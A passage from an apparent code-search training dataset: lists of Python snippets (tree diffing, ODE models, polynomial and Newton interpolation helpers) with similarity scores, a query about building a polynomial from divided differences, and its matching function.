mutual_filesystem_items:\n # Always check subdirectories for e.g file renamings.\n if filesystem_item[-1] == '/':\n subdir_name = filesystem_item\n subdir_path = directory_path + subdir_name\n subdir_updated, subdir_new, subdir_deleted = \\\n compute_tree_changes(dmt_new.children[subdir_name], dmt_old.children[subdir_name], subdir_path)\n \n # Mark the subdirectory if necessary.\n if (dmt_old.children[subdir_name].dmt_hash != dmt_new.children[subdir_name].dmt_hash) or \\\n subdir_updated or subdir_new or subdir_deleted:\n updated.add(subdir_path)\n \n # Incorporate differences from within.\n updated.update(subdir_updated)\n new.update(subdir_new)\n deleted.update(subdir_deleted)\n \n # File with differing hash values.\n elif dmt_old.children[filesystem_item].dmt_hash != dmt_new.children[filesystem_item].dmt_hash:\n filename = filesystem_item\n file_path = directory_path + filename\n updated.add(file_path)\n \n # Compile the set of newly created files.\n for filesystem_item in new_filesystem_items:\n item_path = directory_path + filesystem_item\n new.add(item_path)\n new.update(get_all_paths(dmt_new.children[filesystem_item], item_path))\n \n # Compile the set of deleted files.\n for filesystem_item in deleted_filesystem_items:\n item_path = directory_path + filesystem_item\n deleted.add(item_path)\n deleted.update(get_all_paths(dmt_old.children[filesystem_item], item_path))\n \n return updated, new, deleted", "def diff_eq(self,x,t,par):\n # setting the functions\n s,i,r,d = x\n a,b,r,d,logS0 = par\n\n S0 = 10**logS0\n \n # mathematical equations\n DiffS = - par[1]*(s/S0)*(i**a)\n DiffI = par[1]*(s/S0)*(i**a) -(r+d)*i\n DiffR = r*i\n DiffD = d*i\n \n return [DiffS,DiffI,DiffR,DiffD]", "def get_energy_of_split(self, elem_l, elem_r):\n\n # logging.debug(f\"computing energy of split: {ch_l, ch_r}\")\n\n # elem_l = self.clusters[ch_l]\n # elem_r = self.clusters[ch_r]\n\n # To follow the convention on Ginkgo, to get the correct result, we set t==0 if we have a leaf, i.e. t<t_cut\n l_node_invM = 0\n r_node_invM =0\n l_node_invM = self.momentum[elem_l][0] ** 2 - np.linalg.norm(self.momentum[elem_l][1::]) ** 2\n r_node_invM = self.momentum[elem_r][0] ** 2 - np.linalg.norm(self.momentum[elem_r][1::]) ** 2\n\n logging.debug(f\" t_l ={l_node_invM}\")\n logging.debug(f\" t_R ={r_node_invM}\")\n\n logging.debug(f\" p_l ={self.momentum[elem_l]}\")\n logging.debug(f\" p_r ={self.momentum[elem_r]}\")\n\n split_llh = likelihood.split_logLH_with_stop_nonstop_prob(self.momentum[elem_l],\n self.momentum[elem_r],\n self.min_invM,\n self.Lambda)\n\n\n # logging.debug(f\"split_llh = {split_llh}\")\n\n # llh = split_llh + a_node.map_tree_energy + b_node.map_tree_energy\n logging.debug(f\"split likelihood ={split_llh}\")\n\n return split_llh", "def testListDivide():\n assert listDivide([1,2,3,4,5]) == 2\n assert listDivide([2,4,6,8,10]) == 5\n assert listDivide([30, 54, 63,98, 100], divide = 10) == 2\n assert listDivide([]) == 0\n assert listDivide([1,2,3,4,5], 1) == 5", "def div(a, x):\n return [a[i]/x for i in range(2)]", "def _divide_pred(pred):\n if type(pred) == list:\n fake = []\n real = []\n for p in pred:\n fake.append([tensor[:tensor.size(0) // 2] for tensor in p])\n real.append([tensor[tensor.size(0) // 2:] for tensor in p])\n else:\n fake = pred[:pred.size(0) // 2]\n real = pred[pred.size(0) // 2:]\n\n return fake, real", "def diff_eq(self,x,t,par):\n # setting the functions\n s,i,r,d = x\n b,r,d,logS0 = par\n\n S0 = 10**logS0\n \n # mathematical equations\n DiffS = 0\n DiffI = par[1]*(s/S0)*i\n DiffR = r*i\n DiffD = d*i\n \n return [DiffS,DiffI,DiffR,DiffD]", "def diffs(self):\n return np.array([self.diff(i) for i in self.idx])", "def compute_relative_changes(a_list):\n result = []\n\n for i in range(1,len(a_list)):\n rel = (a_list[i] - a_list[i-1])/a_list[i-1]\n result.append(rel)\n\n return result", "def step(nodes, outputs, edges):\n flowed = []\n for node_name in nodes.copy():\n if node_name in flowed:\n continue\n if len(nodes[node_name]) == 2:\n if node_name in flowed:\n continue\n node = [int(value) for value in nodes[node_name]]\n low_value, high_value = min(node), max(node)\n low_flow, high_flow = edges[node_name] \n low_dictionary, low_node_name = low_flow\n high_dictionary, high_node_name = high_flow\n low_node = low_dictionary.get(low_node_name, tuple())\n high_node = high_dictionary.get(high_node_name, tuple())\n low_dictionary[low_node_name] = low_node + (str(low_value),)\n high_dictionary[high_node_name] = high_node + (str(high_value),)\n nodes[node_name] = tuple()\n if low_dictionary is nodes:\n flowed.append(low_node_name)\n if high_dictionary is nodes:\n flowed.append(high_node_name)\n return nodes, outputs, edges", "def node_diff(self):\n if self.input1 is None or self.input2 is None:\n raise Exception(\"Missing input: please run the populate() method first\")\n if self.node_dict1 is None or self.node_dict2 is None:\n self.make_node_dict()\n # Initialize dictonaries to keep track of the nodes in respnse 1 and response 2\n g1={}\n g2={}\n # Set to keep track of the union of all curie ids\n curie_set = set()\n for curie in self.node_dict1.keys():\n g1[curie] = {}\n # intersection is only in the g1 dictionary\n g1[curie]['intersection'] = set()\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g1[curie]['node'] = set()\n curie_set.add(curie)\n for curie in self.node_dict2.keys():\n g2[curie] = {}\n # node section keeps track of node ids associated with each node i.e. \"n0\"\n g2[curie]['node'] = set()\n curie_set.add(curie)\n node_names1 = []\n node_names2 = []\n\n # extract all node ids (i.e. \"n0\",\"n1\",ect...)\n if len(self.input1['question_graph']['nodes'])>0:\n if 'id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['id'] for x in self.input1['question_graph']['nodes']]\n elif 'node_id' in self.input1['question_graph']['nodes'][0]:\n node_names1 = [x['node_id'] for x in self.input1['question_graph']['nodes']]\n if len(self.input2['question_graph']['nodes'])>0:\n if 'id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['id'] for x in self.input2['question_graph']['nodes']]\n elif 'node_id' in self.input2['question_graph']['nodes'][0]:\n node_names2 = [x['node_id'] for x in self.input2['question_graph']['nodes']]\n \n # initialize the result dictonary\n diff_dict = {}\n diff_dict[\"-1|-1\"] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # initialize node id tuple keys\n for id1 in node_names1:\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2] = {'intersection':[],'g1-g2':[],'g2-g1':[]}\n # iterate through answers\n for answer1 in self.input1['answers']:\n for answer2 in self.input2['answers']:\n for id1 in answer1['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer1['node_bindings'][id1], str):\n bindings1 = [answer1['node_bindings'][id1]]\n elif isinstance(answer1['node_bindings'][id1], list):\n bindings1 = answer1['node_bindings'][id1]\n for curie1 in bindings1:\n # store node id\n g1[curie1]['node'].add(id1)\n for id2 in answer2['node_bindings'].keys():\n # This is to handle cases where answer node id has a list or a string\n if isinstance(answer2['node_bindings'][id2], str):\n bindings2 = [answer2['node_bindings'][id2]]\n elif isinstance(answer2['node_bindings'][id2], list):\n bindings2 = answer2['node_bindings'][id2]\n for curie2 in bindings2:\n # store node id\n g2[curie2]['node'].add(id2)\n if curie1 == curie2:\n # stor intersection tuple\n g1[curie1]['intersection'].add(id1+\"|\"+id2)\n # iterate through all curies\n for curie in curie_set:\n # check if curie is from answer 1\n if curie in g1.keys():\n # check if in intersection\n if len(g1[curie]['intersection'])>0:\n diff_dict[\"-1|-1\"]['intersection'] += [self.node_dict1[curie]]\n for id1 in node_names1:\n for id2 in node_names2:\n node_tuple = id1+\"|\"+id2\n if id1 in g1[curie]['node'] and id2 in g2[curie]['node']:\n diff_dict[node_tuple]['intersection'] += [self.node_dict1[curie]]\n elif id1 in g1[curie]['node']:\n diff_dict[node_tuple]['g1-g2'] += [self.node_dict1[curie]]\n elif id2 in g2[curie]['node']:\n diff_dict[node_tuple]['g2-g1'] += [self.node_dict1[curie]]\n # If not in intersection store in g1-g2\n else:\n diff_dict[\"-1|-1\"]['g1-g2'] += [self.node_dict1[curie]]\n for id1 in g1[curie]['node']:\n # iterate through all answer 2 ids\n for id2 in node_names2:\n diff_dict[id1+\"|\"+id2]['g1-g2'] += [self.node_dict1[curie]]\n # if not in g1 but in g2 then in g2-g1\n elif curie in g2.keys():\n diff_dict[\"-1|-1\"]['g2-g1'] += [self.node_dict2[curie]]\n for id2 in g2[curie]['node']:\n # iterate through all answer 1 ids\n for id1 in node_names1:\n diff_dict[id1+\"|\"+id2]['g2-g1'] += [self.node_dict2[curie]]\n return diff_dict", "def _findTangentSplitAuto(self, angles):\n # get angles from points\n splits = []\n\n # get average variables\n minAngle = min(angles) or 0.00001\n maxAngle = max(angles)\n average = (minAngle + maxAngle) * 0.5\n mean = sum(angles) / len(angles) * 0.5\n\n # get value at which to split\n threshold = (math.log(average) - math.log(mean)) / (math.log(maxAngle) - math.log(minAngle)) * average\n\n # if curve is relatively smooth don't split\n if mean * 10 > average:\n return []\n\n # split based on angles\n for i, angle in enumerate(angles):\n if angle > threshold:\n splits.append(i + 1)\n\n return splits", "def deltaCalc(self, expected):\n \n n = len(self.structure)\n self.delta = [None] * n\n self.delta[n - 1] = []\n \n for i in xrange(len(expected)):\n curr = self.a[n - 1][i]\n self.delta[n - 1].append(self.derivativeFunc(curr) * (expected[i] - curr))\n self.delta[n - 1] = np.array(self.delta[n - 1])\n \n # From n - 1 to 1 layer \n for i in xrange(n - 1, 0, -1):\n currDelta = self.delta[i]\n if i != (n - 1):\n currDelta = currDelta[0][:-1]\n \n self.delta[i - 1] = np.array(np.dot(currDelta, self.theta[i]))\n self.delta[i - 1][0] *= self.a[i - 1]\n \n return", "def subtree_distances(self, root):\r\n\r\n nodes = root.get_terminals()\r\n nodes.reverse()\r\n node_pairs = itertools.ifilter(\r\n lambda (a1, a2): a1.name < a2.name,\r\n itertools.product(nodes, nodes))\r\n\r\n distances = [self._node_distance(pair[0], pair[1])\r\n for pair in node_pairs]\r\n\r\n return distances" ]
[ "0.7081299", "0.526944", "0.52446645", "0.5239564", "0.523342", "0.51974493", "0.51963425", "0.5140926", "0.50798607", "0.5076724", "0.50607145", "0.5054353", "0.5047319", "0.49978474", "0.49799216", "0.49528977", "0.49478018", "0.49372533", "0.49131808", "0.490018", "0.48992065", "0.4881139", "0.483447", "0.48213744", "0.48211652", "0.48179495", "0.4774421", "0.4773157", "0.47703457", "0.47701833", "0.47622505", "0.4756548", "0.47551778", "0.47547767", "0.4747443", "0.4740483", "0.47289827", "0.47096822", "0.47052774", "0.47030467", "0.4702251", "0.47013265", "0.46887287", "0.4685533", "0.46786118", "0.46610072", "0.46476656", "0.4639737", "0.4637906", "0.4625062", "0.46239173", "0.4619137", "0.4612453", "0.46091428", "0.4601979", "0.4597569", "0.459671", "0.45939854", "0.45768806", "0.4569076", "0.45597997", "0.4558658", "0.45555708", "0.45529705", "0.4551819", "0.4549997", "0.4547624", "0.45384267", "0.45300558", "0.4526362", "0.45232844", "0.4520279", "0.45197383", "0.45188397", "0.45123148", "0.45092767", "0.4509249", "0.45070252", "0.45035177", "0.45033658", "0.44852942", "0.4481704", "0.44811776", "0.44747904", "0.44728574", "0.44725865", "0.44647738", "0.44606042", "0.44577897", "0.4456576", "0.44557968", "0.4454424", "0.4448886", "0.4448548", "0.44468504", "0.44465604", "0.44409955", "0.44394305", "0.44353747", "0.4431598" ]
0.77134573
0
Creates polynomial from given list of divided differences. Polynomial string is created according to equation provided in project docs.
def calculate_newton_interpolation(divided_differences): polynomial = [] for i, divided_differences_row in enumerate(divided_differences): polynomial_part = '({0})'.format(divided_differences_row[0].divided_difference) for j in range(0, i): polynomial_part += '*(x-{0})'.format(divided_differences[0][j].x) polynomial_part += '+' polynomial.append(polynomial_part) polynomial_str = ''.join(polynomial)[:-1] print('Calculated polynomial: {0}'.format(polynomial_str)) # Heuristic simplification of calculated polynomial simplified_polynomial = sy.simplify(polynomial_str) print("Simplified polynomial: {0}".format(simplified_polynomial)) return simplified_polynomial
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_to_poly(polynomial_list):\n max_degree = len(polynomial_list) - 1\n strings = []\n opts = ['x', '']\n for index, num in enumerate(polynomial_list):\n if num == 0:\n continue\n if index < max_degree - 1:\n string = '{}x^{}'.format(num, max_degree - index)\n strings.append(string)\n else:\n strings.append(str(num) + opts[index - (max_degree - 1)])\n polynomial = ' + '.join(strings).replace('+ -', '- ')\n return polynomial", "def polynomial_equation(funct):\n coeff = str(differentiation.parse_coefficient(funct))\n if \"^\" not in funct:\n divisor = \"1\"\n else:\n divisor_location = str(funct.index(\"^\") + 1)\n divisor = funct[divisor_location:]\n if divisor == \"-1\":\n pass\n else:\n divisor = str(int(divisor) + 1)\n coeff += \"/\" + divisor\n return coeff + \"x^\" + str(divisor)", "def compute_deriv(poly):\n derivative_of_poly = []\n for i in range(1, len(poly)):\n power = i\n coeff = poly[i]\n y = float(coeff * power)\n first = derivative_of_poly.append(y)\n return derivative_of_poly", "def build_poly(x, degree):\n \"\"\"\n Assemble the 3 label vectors with the original ordering \n Inputs:\n - x (ndarray) : binary prediction for set 1\n - degree (int) : binary prediction for set 2 \n Outputs: \n - p (ndarray) : predicted labels for test set ( with the original ordering)\n \"\"\"\n # forming a matrix containing the data points\n terms = np.hstack([np.ones([x.shape[0],1]),np.tile(x,(1,degree))])\n index = np.arange(degree)+1\n \n # forming a matrix contnaining the exponents\n exponents = np.multiply(np.ones((1, x.shape[1])), index[:, np.newaxis])\n exponents = exponents.reshape([1, x.shape[1]*degree])\n exponents = np.multiply(exponents, np.ones([x.shape[0], 1]))\n exponents = np.hstack([np.ones( (x.shape[0], 1) ),exponents])\n \n # using the exponent matrix as the element-wise exponents of the terms in the terms matrix\n p=np.power(terms,exponents)\n return p", "def poly_derivative(poly):\n if not poly or type(poly) is not list:\n return None\n\n response = []\n\n for order in range(1, len(poly)):\n response.append(order * poly[order])\n\n if not response:\n response.append(0)\n\n return response", "def polynomial_creator(*coefficients):\n def polynomial(x):\n res = 0\n for index, coeff in enumerate(coefficients):\n res += coeff * x** index\n return res\n return polynomial", "def compute_deriv(poly):\n exp = 1\n new_poly = []\n for x in poly[1:]:\n new_poly.append(x * exp)\n exp += 1\n\n return tuple(new_poly)", "def build_poly_expr(query_tuple):\n print(\"query_tuple: \", query_tuple)\n expression = '0 + '\n factors = np.arange(7)\n\n for coeff, factor in zip(query_tuple, factors):\n if coeff != None:\n expression += '(' + str(np.float64(coeff)) + '*x^{}) + '.format(factor)\n\n # Remove trailing '+'\n expression = expression[:-3]\n \n # Return as a tuple.\n return (expression,)", "def get_equation(self):\n self.polynomials = dict(sorted(self.polynomials.items(), reverse=True))\n string = \"\"\n\n for index, polynomial in self.polynomials.items():\n polynomial = int(polynomial)\n index = int(index)\n\n if polynomial != 0:\n if polynomial < 0:\n string_pre = \" - \"\n else:\n string_pre = \" + \"\n\n if index != 0:\n string_append = \"x\"\n elif polynomial == 1 or polynomial == -1:\n string_append = str(abs(polynomial))\n else:\n string_append = \"\"\n\n if polynomial < 0:\n polynomial = abs(polynomial)\n\n if polynomial != 1:\n string_append = str(polynomial) + string_append\n\n if index != 0 and index != 1:\n string_append += \"^\" + str(index)\n\n string += string_pre + string_append\n\n if len(string) > 0:\n string = string[3:]\n else:\n string = \"0\"\n\n return string", "def coefficients_from_Weierstrass_polynomial(f):\n R = f.parent()\n cubic_variables = [x for x in R.gens() if f.degree(x) == 3]\n quadratic_variables = [y for y in R.gens() if f.degree(y) == 2]\n try:\n x = cubic_variables[0]\n y = quadratic_variables[0]\n except IndexError:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n a1 = a2 = a3 = a4 = a6 = 0\n x3 = y2 = None\n for coeff, mon in f:\n if mon == x**3:\n x3 = coeff\n elif mon == x**2:\n a2 = coeff\n elif mon == x:\n a4 = coeff\n elif mon == 1:\n a6 = coeff\n elif mon == y**2:\n y2 = -coeff\n elif mon == x*y:\n a1 = -coeff\n elif mon == y:\n a3 = -coeff\n else:\n raise ValueError('polynomial is not in long Weierstrass form')\n\n if x3 != y2:\n raise ValueError('the coefficient of x^3 and -y^2 must be the same')\n elif x3 != 1:\n a1, a2, a3, a4, a6 = a1/x3, a2/x3, a3/x3, a4/x3, a6/x3\n return [a1, a2, a3, a4, a6]", "def test():\n assert str(Polynomial(0, 1, 0, -1, 4, -2, 0, 1, 3, 0)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial([-5, 1, 0, -1, 4, -2, 0, 1, 3, 0])) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x - 5\"\n assert str(Polynomial(x7=1, x4=4, x8=3, x9=0, x0=0, x5=-2, x3=-1, x1=1)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n assert str(Polynomial(x2=0)) == \"0\"\n assert str(Polynomial(x0=0)) == \"0\"\n assert Polynomial(x0=2, x1=0, x3=0, x2=3) == Polynomial(2, 0, 3)\n assert Polynomial(x2=0) == Polynomial(x0=0)\n assert str(Polynomial(x0=1) + Polynomial(x1=1)) == \"x + 1\"\n assert str(Polynomial([-1, 1, 1, 0]) + Polynomial(1, -1, 1)) == \"2x^2\"\n pol1 = Polynomial(x2=3, x0=1)\n pol2 = Polynomial(x1=1, x3=0)\n assert str(pol1 + pol2) == \"3x^2 + x + 1\"\n assert str(pol1 + pol2) == \"3x^2 + x + 1\"\n assert str(Polynomial(x0=-1, x1=1) ** 1) == \"x - 1\"\n assert str(Polynomial(x0=-1, x1=1) ** 2) == \"x^2 - 2x + 1\"\n pol3 = Polynomial(x0=-1, x1=1)\n assert str(pol3 ** 4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(pol3 ** 4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n assert str(Polynomial(x0=2).derivative()) == \"0\"\n assert str(Polynomial(x3=2, x1=3, x0=2).derivative()) == \"6x^2 + 3\"\n assert str(Polynomial(x3=2, x1=3, x0=2).derivative().derivative()) == \"12x\"\n pol4 = Polynomial(x3=2, x1=3, x0=2)\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert str(pol4.derivative()) == \"6x^2 + 3\"\n assert Polynomial(-2, 3, 4, -5).at_value(0) == -2\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3) == 20\n assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3, 5) == 44\n pol5 = Polynomial([1, 0, -2])\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-2.4) == -10.52\n assert pol5.at_value(-1, 3.6) == -23.92\n assert pol5.at_value(-1, 3.6) == -23.92", "def poly_derivative(poly):\n if type(poly) is not list or len(poly) < 1:\n return None\n if len(poly) == 1:\n return [0]\n\n derivated_coefficients = []\n\n for power, coefficient in enumerate(poly):\n if power == 0:\n pass\n\n else:\n new_coefficient = coefficient * power\n derivated_coefficients.append(new_coefficient)\n\n return(derivated_coefficients)", "def _poly_func(x, a, b, c, d, e):\n return a * x ** 6 + b * x ** 5 + c * x ** 4 + d * x ** 3 + e * x ** 2", "def construct_poly(data, power):\n return np.power(data, power)", "def fourth_poly(a, b, c, d, e):\n return lambda z: a*z**4 + b*z**3 + c*z**2 + d*z + e", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return phi.T", "def linear_simplify_poly(poly):\n if len(poly) < 4:\n return poly\n\n q = Queue()\n for v in poly:\n q.put(v)\n\n new_poly = []\n a = q.get()\n b = q.get()\n while True:\n if q.empty():\n new_poly += [a,b]\n break\n c = q.get()\n e1 = (b-a).normalized()\n e2 = (c-b).normalized()\n if abs(1.0 - e1.dot(e2)) < 1e-2:\n # colinear. skip b.\n a = a\n b = c\n else:\n # a,b needed.\n new_poly += [a]\n a = b\n b = c\n return new_poly", "def polyLS(pd, x, y, f, X, Y \\\n, coeff = [], xmc = [], ymc = [], ell = [], w = [], ELL = [], W = []) :\n xmc, ymc, ell, w, ELL, W = assignDefaults(x, y, xmc, ymc, ell, w, ELL, W)\n \n numP = int((pd + 1) * (pd + 2) / 2)\n \n if (len(xmc) == 1) and (len(ymc) == 1) :\n \n\n if coeff == [] :\n p = poly(x, y, pd)\n coeff = np.linalg.lstsq(p, f, rcond=None)[0]\n\n B = poly(X, Y, pd)\n approx = B.dot(coeff).flatten()\n coeff_copy = coeff\n \n else :\n \n approx = np.zeros(len(X), float)\n \n if coeff == [] :\n for i in range(len(xmc)) :\n IND = inSquare(x, y, xmc[i], ymc[i], ELL, W)\n if len(IND) < int(1.5 * numP) :\n raise ValueError(\"Not enough data for this polynomial \" \\\n + \"degree.\\nEither lower the polynomial degree or \" \\\n + \"decrease the number of subdivisions.\")\n p = poly(x[IND], y[IND], pd)\n lam = np.linalg.lstsq(p, f[IND], rcond=None)[0]\n coeff.append(lam)\n\n coeff_copy = coeff.copy()\n\n for i in range(len(xmc) - 1, -1, -1) :\n IND = inSquare(X, Y, xmc[i], ymc[i], ell, w)\n B = poly(X[IND], Y[IND], pd)\n lam = coeff.pop()\n approx[IND] = B.dot(lam).flatten()\n \n return approx, coeff_copy", "def poly_derivative(poly):\n if not type(poly) is list or len(poly) == 0 or type(poly[0]) is not int:\n return None\n\n derivative = []\n for i in range(1, len(poly)):\n derivative.append(poly[i] * i)\n\n if derivative == []:\n derivative = [0]\n\n return derivative", "def poly_desc(W, b):\n result = 'y = '\n for i, w in enumerate(W):\n result += '{:+.2f} x^{} '.format(w, len(W) - i)\n result += '{:+.2f}'.format(b[0])\n return result", "def linear_polynomial(self, e: 'PFElement') -> Polynomial:\n poly = self.polynomial(-e)\n poly += poly.monic(1)\n return poly", "def parse_poly(self, expr: str) -> Polynomial:\n return symbolic_polynomial(expr, self)", "def poly_derivative(poly):\n res = []\n if type(poly) is not list or len(poly) == 0:\n return None\n if len(poly) == 1:\n return([0])\n for i in range(1, len(poly)):\n if type(poly[i]) is not int:\n return None\n res.append(poly[i] * i)\n return(res)", "def polynomial(self, *args, indeterminate: str = 'X') -> Polynomial:\n return Polynomial([self.element(c) for c in args], base_field=self, indeterminate=indeterminate)", "def newton_divided_difference(x, y):\n\n n = x.size\n q = np.zeros((n, n - 1))\n # Insert 'y' in the first column of the matrix 'q'\n q = np.concatenate((y[:, None], q), axis=1)\n\n for i in range(1, n):\n for j in range(1, i + 1):\n q[i, j] = (q[i, j - 1] - q[i - 1, j - 1]) / (x[i] - x[i - j])\n\n # Copy the diagonal values of the matrix q to the vector f\n f = np.zeros(n)\n for i in range(0, n):\n f[i] = q[i, i]\n\n # Prints the polynomial\n print(\"The polynomial is:\")\n print(\"p(x)={:+.4f}\".format(f[0]), end=\"\")\n for i in range(1, n):\n print(\"{:+.4f}\".format(f[i]), end=\"\")\n for j in range(1, i + 1):\n print(\"(x{:+.4f})\".format(x[j] * -1), end=\"\")\n print(\"\")\n\n return [f]", "def poly_derivative(poly):\n result = []\n\n if poly is None or type(poly) != list or poly == []:\n return None\n\n for i in range(len(poly)):\n if type(poly[i]) not in (int, float):\n return None\n elif len(poly) == 1:\n result.append(0)\n else:\n if i == 0:\n continue\n result.append(i * poly[i])\n\n return result", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def poly_derivative(poly):\n if type(poly) != list:\n return None\n size = len(poly)\n if size == 0:\n return None\n for e in poly:\n if not isinstance(e, (int, float)):\n return None\n if size == 1:\n return [0]\n deriv = []\n for i in range(1, size):\n temp = poly[i] * i\n deriv.append(temp)\n return deriv", "def base_polynome(numbers):\n\n monomes = [ x**n for n in numbers ]\n polynome = sum(monomes)\n\n return poly(polynome, x)", "def _poly_desc(self, W, b):\n\t\tresult = 'y = '\n\t\tfor i, w in enumerate(W):\n\t\t\tresult += '{:+.2f} x^{} '.format(w, len(W) - i)\n\t\tresult += '{:+.2f}'.format(b[0])\n\t\treturn result", "def definePolyFunction():\n lstWeights=[]\n degree = input(\"degree of polynomial in terms of highest exponent of x:\")\n degree = int(degree+1)\n for a in range (0,degree):\n string='weight for x^'+str(a)+':'\n weight = input(string)\n weight = float(weight)\n lstWeights.append(weight)\n return lstWeights", "def poly_derivative(poly):\n if not isinstance(poly, list):\n return None\n elif len(poly) == 0:\n return None\n elif len(poly) == 1:\n return [0]\n else:\n deriv = [0] * (len(poly) - 1)\n for i in range(len(poly) - 1):\n if (not isinstance(poly[i], int)):\n return None\n deriv[i] = poly[i + 1] * (i + 1)\n return deriv", "def general_poly(L):\n def evaluate(x):\n length=len(L)-1\n value=0\n for i in L:\n value+=i*(x**length)\n length-=1\n return value\n return evaluate", "def lsf2poly(lsf):\n # Reference: A.M. Kondoz, \"Digital Speech: Coding for Low Bit Rate Communications\n # Systems\" John Wiley & Sons 1994 ,Chapter 4\n\n # Line spectral frequencies must be real.\n\n lsf = np.array(lsf)\n\n if max(lsf) > np.pi or min(lsf) < 0:\n raise ValueError('Line spectral frequencies must be between 0 and pi.')\n\n p = len(lsf) # model order\n\n # Form zeros using the LSFs and unit amplitudes\n z = np.exp(1.j * lsf)\n\n # Separate the zeros to those belonging to P and Q\n rQ = z[0::2]\n rP = z[1::2]\n\n # Include the conjugates as well\n rQ = np.concatenate((rQ, rQ.conjugate()))\n rP = np.concatenate((rP, rP.conjugate()))\n\n # Form the polynomials P and Q, note that these should be real\n Q = np.poly(rQ);\n P = np.poly(rP);\n\n # Form the sum and difference filters by including known roots at z = 1 and\n # z = -1\n\n if p % 2:\n # Odd order: z = +1 and z = -1 are roots of the difference filter, P1(z)\n P1 = np.convolve(P, [1, 0, -1])\n Q1 = Q\n else:\n # Even order: z = -1 is a root of the sum filter, Q1(z) and z = 1 is a\n # root of the difference filter, P1(z)\n P1 = np.convolve(P, [1, -1])\n Q1 = np.convolve(Q, [1, 1])\n\n # Prediction polynomial is formed by averaging P1 and Q1\n\n a = .5 * (P1 + Q1)\n return a[0:-1:1] # do not return last element", "def poly_eq(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n coef_arr = model.coef_\n intercept_arr = model.intercept_\n \n poly_equation = \"y = \" + str(round(coef_arr[0][2], 4)) + \"x\\xB2\"\n \n if(coef_arr[0][1] < 0):\n poly_equation += \" + (\" + str(round(coef_arr[0][1], 4)) + \"x\" + \")\"\n else:\n poly_equation += \" + \" + str(round(coef_arr[0][1], 4)) + \"x\"\n \n if(intercept_arr[0] < 0):\n poly_equation += \" + (\" + str(round(intercept_arr[0], 4)) + \")\"\n else:\n poly_equation += \" + \" + str(round(intercept_arr[0], 4))\n \n return poly_equation\n except Exception as e:\n print(e)", "def deriv(self):\n poly_deriv = []\n for i, val in enumerate(self.coeff):\n poly_deriv.append(i*val)\n # Removes the differentiated constant (which is always 0).\n del poly_deriv[0]\n return Poly(poly_deriv)", "def Hcurl_polynomials(\n domain_dim: int, range_dim: int, order: int, variables: AxisVariablesNotSingle = x\n) -> typing.List[VectorFunction]:\n assert domain_dim == range_dim\n if domain_dim == 2:\n return [VectorFunction((\n variables[0] ** (order - 1 - j) * variables[1] ** (j + 1),\n -variables[0] ** (order - j) * variables[1] ** j,\n )) for j in range(order)]\n if domain_dim == 3:\n poly: typing.List[VectorFunction] = []\n poly += [VectorFunction((\n variables[0] ** (m - 1) * variables[1] ** n * variables[2] ** (order - m - n + 1),\n 0, -variables[0] ** m * variables[1] ** n * variables[2] ** (order - m - n)\n )) for n in range(order) for m in range(1, order + 1 - n)]\n poly += [VectorFunction((\n 0, variables[0] ** m * variables[1] ** (n - 1) * variables[2] ** (order - m - n + 1),\n -variables[0] ** m * variables[1] ** n * variables[2] ** (order - m - n)\n )) for m in range(order) for n in range(1, order + 1 - m)]\n poly += [VectorFunction((\n variables[0] ** (order - n) * variables[1] ** n,\n -variables[0] ** (order + 1 - n) * variables[1] ** (n - 1), 0\n )) for n in range(1, order + 1)]\n return poly\n raise ValueError(f\"Unsupported dimension: {domain_dim}\")", "def build_poly(x, degree): \n # ***************************************************\n # COPY YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def __str__(self) -> str:\n polynomial = \"\"\n for i in range(self.degree, -1, -1):\n if self.coefficients[i] == 0:\n continue\n elif self.coefficients[i] > 0:\n if polynomial:\n polynomial += \" + \"\n else:\n polynomial += \" - \"\n\n if i == 0:\n polynomial += str(abs(self.coefficients[i]))\n elif i == 1:\n polynomial += str(abs(self.coefficients[i])) + \"x\"\n else:\n polynomial += str(abs(self.coefficients[i])) + \"x^\" + str(i)\n\n return polynomial", "def horner(poly: Sequence[float], x: float) -> float:\n result = 0.0\n for coeff in reversed(poly):\n result = result * x + coeff\n return result", "def simplify(self): # TODO too complex, refactor\n simplified = self.__simplifyRecurse()\n # distributed out the polynomial. Now need to collect like terms\n simplified.vars = self.vars.copy()\n orderedVars = sorted(list(self.vars))\n\n powers = {} # will have keys of tuples. The tuples will represent the power of a variable. Values will be the\n for monomial in simplified.poly[1:]:\n power = [0] * len(orderedVars)\n total = 0\n\n if monomial.isSimple():\n monomial.poly = [\"*\", monomial.poly]\n\n for term in 